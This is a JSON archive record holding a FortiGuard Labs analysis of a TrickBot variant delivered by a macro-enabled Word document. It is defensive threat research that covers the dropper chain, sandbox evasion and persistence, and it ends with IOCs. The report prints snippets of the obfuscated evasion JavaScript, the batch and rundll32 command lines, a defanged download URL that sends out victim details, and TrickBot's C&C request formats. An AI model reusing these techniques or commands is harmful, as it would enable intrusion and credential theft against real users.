{
	"id": "c74a134b-4888-4aea-aad4-f828541c65d9",
	"created_at": "2026-04-06T00:18:30.071472Z",
	"updated_at": "2026-04-10T13:11:38.195678Z",
	"deleted_at": null,
	"sha1_hash": "9c931ae1f11b918d1ae7a3540ffa3c6446ffdefa",
	"title": "New Variant of TrickBot Being Spread by Word Document | FortiGuard Labs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1613278,
	"plain_text": "New Variant of TrickBot Being Spread by Word Document | FortiGuard Labs\r\nBy Xiaopeng Zhang\r\nPublished: 2020-03-09 · Archived: 2026-04-05 22:34:06 UTC\r\nFortiGuard Labs Threat Analysis Report\r\nAffected platforms: Windows\r\nImpacted parties: Online banking users\r\nImpact: Collects sensitive information and controls victims’ computers\r\nSeverity level: High\r\nTrickBot is a malware family first captured by FortiGuard Labs and then analyzed by me back in 2016. TrickBot is a\r\nmodule-based malware, which means it can extend its functionalities by downloading new modules from its C\u0026C server and\r\nexecuting them on its victim’s device. While it was initially identified as a banking Trojan, it has gradually extended its\r\nfunctionalities to collect credentials from its victims’ email accounts, browsers, installed network apps, and so on. It is also\r\nable to send spam to its victim’s email contacts, as well as deliver other malware to the victim’s device, such as Emotet.\r\nRecently, FortiGuard Labs captured an MS Office Word sample in the wild that is spreading a new variant of TrickBot. I did\r\nan analysis on this sample file, and in this post I will explain how it works on the victim’s machine.\r\nAnalyzing the Word Document\r\nWhen the malicious Word document is opened with MS Office Word, it requests input, as shown in Figure 1, by asking the\r\nvictim to click the “Enable Content” button to enable the document’s Macro feature. Once this is done, its malicious Macro\r\n(VBA code) is executed.\r\nFigure 1. Word document content\r\nBy going to the Menu “Developer”-\u003e “Visual Basic” we can check out the Macro’s VBA modules and code. The Macro\r\nproject is password-protected, so we cannot see any of the detailed information until we provide the correct password.\r\nFortunately, there is a way to bypass this protection by modifying its binary file. 
\r\nThe Word document was built on a Chess-related project named “ChessBrainVBA.” You can see the form of the Chess\r\nproject in Figure 2.\r\nhttps://www.fortinet.com/blog/threat-research/new-variant-of-trickbot-being-spread-by-word-document.html\r\nPage 1 of 12\n\nFigure 2. Content of ChessBrainVBA project\r\nOn the form there is a Label control containing the malicious JS code, outlined with a red rectangle.\r\nOne of the VBA modules has an autorun() function that is called automatically when the Word document opens. The VBA\r\ncode then extracts two files onto the victim’s system.\r\nOne file is “C:\\AprilReport\\LogsTsg\\LogsTsg7\\LogsTsg8\\List1.bat”, with content “cscript //nologo\r\nC:\\AprilReport\\List1.jse”, and the other is “C:\\AprilReport\\List1.jse”, with the JavaScript code from the Label control in Figure\r\n2, which is a huge block of obfuscated JavaScript. It then starts the first extracted file “List1.bat”, which calls “cscript” to run\r\nthe huge JavaScript file “List1.jse”.\r\nAnti-Analysis Applied in JavaScript Code\r\nThe JavaScript code is very heavily obfuscated. This protects the API function calls and constant strings from being\r\nidentified. It also uses a lot of anonymous functions.\r\nWhen the code starts, it first waits around one minute to bypass any auto-analysis tools by seeming to be inert.\r\nAfter waiting, it then executes the query \"Select * from Win32_Process\" to obtain all running processes. It then concatenates\r\nthe names of these processes and checks to see if the resulting length is less than 3100. If so, it raises an\r\nexception and closes. Usually, on a real computer, this length is larger than 3100. 
With this measure, it is better able to bypass\r\nmany auto-analysis systems, including Sandboxes and Virtual Machines.\r\nThe following code snippet shows the process-name length check:\r\nif (msdgnwould99[var001] \u003c 3100 \u0026\u0026 msdgnMarch16) {\r\n            this[(function(unwask5) {\r\n                unwask5[Tvif_rt] = 3;\r\n                unwask5[Tvif_rt - 6] = 83;\r\n                return nSjWorb(nSjWorbEx() + (unwask5[60] - unwask5[Tvif_rt]), 'f');\r\n            })(Dikrt, null, true, 'andall4') + (function(fhhreme3) {\r\n                fhhreme3[Tvif_rt] = 0;\r\n                fhhreme3[Tvif_rt - 6] = 111;\r\n                return nSjWorb(nSjWorbEx() + (fhhreme3[60] - fhhreme3[Tvif_rt]), 'f');\r\n            })(Dikrt) + (function(vjvlike73) {\r\n                vjvlike73[Tvif_rt] = 2;\r\n                vjvlike73[Tvif_rt - 6] = 113;\r\n                return nSjWorb(nSjWorbEx() + (vjvlike73[60] - vjvlike73[Tvif_rt]), 'f');\r\n            })(Dikrt, 'outfit92', 'really69')]((function(kuicur4) {\r\n                kuicur4[Tvif_rt] = 2;\r\n                kuicur4[Tvif_rt - 6] = 78;\r\n                return nSjWorb(nSjWorbEx() + (kuicur4[60] - kuicur4[Tvif_rt]), 'f');\r\n            })(Dikrt, 'tits24', 2872) + (function(jiqthin4) {\r\n                jiqthin4[Tvif_rt] = 4;\r\n                jiqthin4[Tvif_rt - 6] = 105;\r\n                return nSjWorb(nSjWorbEx() + (jiqthin4[60] - jiqthin4[Tvif_rt]), 'f');\r\n            })(Dikrt, 'nice54', 2910, 'dudes7', 'stop11') + (function(utscust3) {\r\n                utscust3[Tvif_rt] = 3;\r\n                utscust3[Tvif_rt - 6] = 104;\r\n                return nSjWorb(nSjWorbEx() + (utscust3[60] - utscust3[Tvif_rt]), 'f');\r\n            })(Dikrt, null, 'this43', null) + (function(fisth3) {\r\n                fisth3[Tvif_rt] = 3;\r\n                fisth3[Tvif_rt - 6] = 78;\r\n                return nSjWorb(nSjWorbEx() + (fisth3[60] - fisth3[Tvif_rt]), 'f');\r\n            })(Dikrt, 'daughter92', null, 'when24') + (function(fuecusto3) {\r\n                fuecusto3[Tvif_rt] = 1;\r\n                fuecusto3[Tvif_rt - 6] = 118;\r\n                return nSjWorb(nSjWorbEx() + (fuecusto3[60] - fuecusto3[Tvif_rt]), 'f');\r\n            })(Dikrt, 'this43') + (function(jpsaske4) {\r\n                jpsaske4[Tvif_rt] = 3;\r\n                jpsaske4[Tvif_rt - 6] = 113;\r\n                return nSjWorb(nSjWorbEx() + (jpsaske4[60] - jpsaske4[Tvif_rt]), 'f');\r\n            })(Dikrt, 'andall4', true, 'nothin66') + (function(ujnthey3) {\r\n                ujnthey3[Tvif_rt] = 4;\r\n                ujnthey3[Tvif_rt - 6] = 107;\r\n                return nSjWorb(nSjWorbEx() + (ujnthey3[60] - ujnthey3[Tvif_rt]), 'f');\r\n            })(Dikrt, true, 'daughter92', true, true));\r\n        }\r\nTo analyze this JavaScript code, I created some local variables to split the anonymous function result.\r\n“msdgnwould99[var001]” is the length of all process names, where “msdgnwould99” contains all process names,\r\nand “var001” is a created local variable whose value is “length”. msdgnMarch16 is a variable with a default value of\r\n“1”. The “if” sub-branch also calls a non-existent function that raises an exception and exits.\r\nDownloading the TrickBot Payload and Maintaining Persistence\r\nThe JavaScript code then downloads a file from its server. The request looks like this:\r\nhxxps[:]//45[.]138[.]72[.]155/1/1.php?h=m25\u0026j=8b1e7a89\u0026l=Mytest01-PC@@Mytest01-\r\nPC@@Mytest01@@*147[.]2[.]3[.]15%3A%3A%5B00000007%5D%20Intel%28R%29%20PRO/1000%20MT%20Desktop%20Adapter\u002612455532\r\nThe parameter portion contains the victim’s computer name, login username, IP address, and network card information. The\r\nserver then replies to this request with a base64 encoded PE file. 
Figure 3 shows the received base64 encoded PE file\r\ncontent.\r\nFigure 3. HTTPS request and response with base64 encoded content\r\nThe JavaScript code saves this file into the system’s %temp% folder, and it also copies the current JavaScript file into the\r\nsystem’s %temp% folder. Later, it runs the copied JavaScript file from the %temp% folder and exits the current one.\r\nThis time, it checks to see if it runs from the %temp% folder. If yes, it reads the downloaded file and puts its base64-decoded\r\ncontent into a file under the %temp% folder, which is “8a1e7a8988168816.com” on my test computer. This file is\r\nthe payload of this variant of TrickBot, which will be started by the JavaScript. I’ll elaborate on this in the next section.\r\nMeanwhile, it copies the JavaScript file into the Windows startup folder so it can start whenever Windows OS starts. In\r\nprevious versions, it used to install itself as a Scheduled Task or be added into the system registry’s Auto-Run group to\r\nmaintain persistence.\r\nIn Figure 4, you will find it using the Windows Start Menu.\r\nFigure 4. JavaScript file has been added into Startup in Start Menu\r\nStarting Payload of TrickBot\r\nThe downloaded payload file “8a1e7a8988168816.com” is a DLL file that is executed in rundll32.exe, which is a Windows-default program used to run a DLL file as a program, using the command line \"C:\\Windows\\System32\\rundll32.exe\r\nC:\\Users\\{user name}\\AppData\\Local\\Temp\\8a1e7a8988168816.com InitLibrary\".\r\nAs I mentioned above, as well as in my previous analysis, TrickBot is a modular Trojan. 
It is able to download modules (DLL\r\nfiles) from its C\u0026C server, load them into the newly-created process “svchost.exe,” then execute one module in the\r\n“svchost.exe” process.\r\nTrickBot communicates with these modules (svchost.exe) through a named pipe and shared memory by calling API\r\nfunctions like ReadProcessMemory(), WriteProcessMemory() and so on. Once it starts a module in a svchost.exe, it then\r\nstarts a corresponding thread function to continue communicating with the module.\r\nResearchers have found that it has delivered the following modules in the past: systeminfo, injectDll, pwgrab, importDll,\r\nmshareDll, mwormDll, tabDll, vncDll, and so on. I even did some analysis on some of them. From the module name you\r\ncan often guess what the module’s purpose is. I will next explain what the internal code structure of TrickBot is and how it\r\ndownloads those modules.\r\nWhen “8a1e7a8988168816.com” starts in rundll32.exe, its entry function DllMain() is called, which then decrypts and\r\nextracts another executable module (EXE file) into its memory. It then dynamically adjusts some section data, such as the\r\nimport table and relocation data. After everything is ready, its entry point function is called. From then on, all TrickBot\r\ntasks are performed by the extracted module.\r\nThe first time it runs, it creates a home folder named “DirectTools” under the %AppData% folder for saving its\r\nconfiguration settings, future downloaded module files, as well as module configuration files.\r\nThe configuration file of TrickBot is saved under a randomly chosen file name in its home directory. The content is encrypted\r\nand obfuscated. 
It contains a group tag (“red4” for this variant), client_id (generated with the victim’s computer name), as\r\nwell as the TrickBot version, its C\u0026C server IP address, and Port list information. Figure 5 shows what this saved\r\nconfiguration file looks like. This time, the file name is “revocations.txt”, the red rectangles identify two encrypted data sets,\r\nand the other readable texts are trash data.\r\nFigure 5. The encrypted and obfuscated configuration file\r\nFigure 6 shows the C\u0026C server information that was decrypted in a text editor from the file shown in Figure 5. You can see\r\nthat it contains the TrickBot version (1000500), server IP and Port information, and the auto-loaded module “pwgrab”.\r\nFigure 6. Decrypted configuration information\r\nSending Commands to the C\u0026C Server and Downloading Modules\r\nTrickBot has many commands it can use to communicate with its server, whose IP address and Port are randomly chosen\r\nfrom the server configuration data shown in Figure 6. Some of the command content is listed below in chronological order to\r\nexplain how they work. 
\r\nAll the commands are in this format:\r\n/group_ID/Client_ID/command number/other payload information\r\nThe group ID is “red4” and the Client_ID is “Mytest01-PC_W617601.46499EE873EAC4080BFC4E488048CEAA” for my\r\ntest environment.\r\nCommand 5:\r\n\"GET /red4/Mytest01-PC_W617601.46499EE873EAC4080BFC4E488048CEAA/5/spk/\"\r\nThis is the first packet sent to its C\u0026C server.\r\nCommand 0:\r\n\"GET /red4/Mytest01-PC_W617601.46499EE873EAC4080BFC4E488048CEAA/0/Windows\r\n7 x86 SP1/1086/{my global\r\nip}/2203029355927E4792CADE316791C927FFC55D5E56150F111936DFD52481C7D7/sMU2E48oEOgEGkiGss\r\nThis command submits the victim’s system information and global IP address to the C\u0026C server. The response packet\r\ncontains another server IP address and Port list for downloading modules.\r\nCommand 14:\r\n\"GET /red4/Mytest01-PC_W617601.46499EE873EAC4080BFC4E488048CEAA/14/user/Mytest01/0/\"\r\nThis command submits to the server the victim device’s information, such as Logon User Name, network status, and so on.\r\nCommand 63:\r\n\"POST red4/Mytest01-PC_W617601.46499EE873EAC4080BFC4E488048CEAA/63/systeminfo/GetSystemInfo/c3VjY2Vzcw==\"\r\nThis command tells the server that the “systeminfo” module was a success. “systeminfo” was a module (no longer a DLL\r\nfile in this variant) used in other versions to collect system information from the victim’s device and then send it to its\r\nserver. However, in this variant this module is already integrated into TrickBot.\r\nCommand 5:\r\n\"GET /red4/Mytest01-PC_W617601.46499EE873EAC4080BFC4E488048CEAA/5/pwgrab32/\"\r\nThis command asks the C\u0026C server to send back the module “pwgrab32”. As you may recall from Figure 6, “pwgrab”\r\nwas picked from the decrypted configuration file, where it was set as “autorun”. Therefore, it is the first module to be\r\ndownloaded. 
My test environment is a 32-bit Windows OS, so the requested module name is “pwgrab32”, and it is\r\n“pwgrab64” for a 64-bit Windows OS. Note that this command is sent to one server of the server IP and Port list based on\r\nthe response from command 0.\r\n\"GET /red4/Mytest01-PC_W617601.46499EE873EAC4080BFC4E488048CEAA/5/dpost/\"\r\nNext, it sends another command 5 request to download the configuration file for “pwgrab”.\r\nCommand 64:\r\n\"POST red4/Mytest01-PC_W617601.46499EE873EAC4080BFC4E488048CEAA/64/pwgrab/VERS/browser/\"\r\nWhen module “pwgrab” runs in svchost.exe, it directly sends stolen data to its C\u0026C server, whose IP address and Port are\r\ndefined in its configuration file (dpost file). Meanwhile, “pwgrab” updates TrickBot with its current status, and TrickBot\r\nthen updates that status to its C\u0026C server by submitting command 64. For this one, it sends pwgrab’s version information.\r\nCommand 23:\r\n\"GET /red4/Mytest01-PC_W617601.46499EE873EAC4080BFC4E488048CEAA/23/1000499/\"\r\nCommand 23 is used to request up-to-date server configuration data, which overwrites the data shown in Figure 6. Figure 7\r\nis a screenshot of the up-to-date server configuration, which was just decrypted. The version has now become “1000502”.\r\nFigure 7. Up-to-date server configuration information\r\nCommand 1:\r\n\"GET /red4/Mytest01-PC_W617601.46499EE873EAC4080BFC4E488048CEAA/1/40sQwU0W2YyUyQuOo/\"\r\nThis command queries the C\u0026C server for tasks. 
The server can then reply with something similar to the response below, where you can see the\r\nstring “networkDll start”, which tells TrickBot to start the module “networkDll”.\r\nHere is the response content:\r\n\"/62/red4/Mytest01-PC_W617601.46499EE873EAC4080BFC4E488048CEAA/bpdTFBvlTHxhZFzpXF1nXF1l/96322307/\\r\\nnetwork\r\nstart\\r\\n\"\r\nTrickBot sends command 5 with “networkDll32” to the C\u0026C server, whose IP address and Port are from command 0’s\r\nresponse, to download it.\r\n\"GET /red4/Mytest01-PC_W617601.46499EE873EAC4080BFC4E488048CEAA/5/networkDll32/\"\r\nNote: Most of this TrickBot variant’s constant strings mentioned in this post, and most data returned from the\r\nC\u0026C server (such as modules), are encrypted. What I have referred to in this post is the decrypted plaintext. The downloaded\r\nmodules and other files are saved in its home directory (“%AppData%\\DirectTools” for this variant). Before they are saved,\r\nthey are all double encrypted.\r\nConclusion\r\nIn this post, we detailed how this fresh TrickBot variant works on a victim's machine, what technologies it uses to perform\r\nanti-analysis, as well as how the payload of TrickBot communicates with its C\u0026C server to download the modules.\r\nTrickBot has been active for years. The server configuration version is now 1000502, compared to the version number when\r\nwe first captured it in 2016, which was 1000004. We think it will keep upgrading itself from time to time. 
Since we will\r\ncontinue monitoring it, readers can expect that we will continue to publish new technical analysis and updates whenever a\r\nnew campaign is captured in the future.\r\nSolution\r\nFortinet customers are already protected from this TrickBot variant by FortiGuard’s Web Filtering, AntiVirus, and IPS\r\nservices as follows:\r\nThe downloading URL is rated as \"Malicious Websites\" by the FortiGuard Web Filtering service.\r\nThe Word document and downloaded Dll file are detected as \"VBA/TrickBot.MRVB!tr\" and “W32/TrickBot.EFDC!tr”\r\nand blocked by the FortiGuard AntiVirus service.\r\nThe IP addresses of the C\u0026C server are detected and blocked by the FortiGuard IPS signature “Trojan.TrickBot”.\r\nIOCs:\r\nURLs\r\nhxxps[:]//45[.]138[.]72[.]155/1/1.php?h=m25\u0026j=8b1e7a89\u0026l={…}\r\nTrickBot C\u0026C server IP address and Port list:\r\nSample SHA-256\r\n[Captured Word document]\r\n533BA6AF6FB6A529AF62B0AF69EFF78DFE2478E8E693CD4FA4A3FEC01570DDFA\r\n[Base64 decoded Dll file or 8a1e7a8988168816.com]\r\n70B3DA66AD99BCA8703EF61D3F8406B3D0B05AD60D10318270F41A064D065791\r\nSource: https://www.fortinet.com/blog/threat-research/new-variant-of-trickbot-being-spread-by-word-document.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/new-variant-of-trickbot-being-spread-by-word-document.html"
	],
	"report_names": [
		"new-variant-of-trickbot-being-spread-by-word-document.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434710,
	"ts_updated_at": 1775826698,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9c931ae1f11b918d1ae7a3540ffa3c6446ffdefa.pdf",
		"text": "https://archive.orkl.eu/9c931ae1f11b918d1ae7a3540ffa3c6446ffdefa.txt",
		"img": "https://archive.orkl.eu/9c931ae1f11b918d1ae7a3540ffa3c6446ffdefa.jpg"
	}
}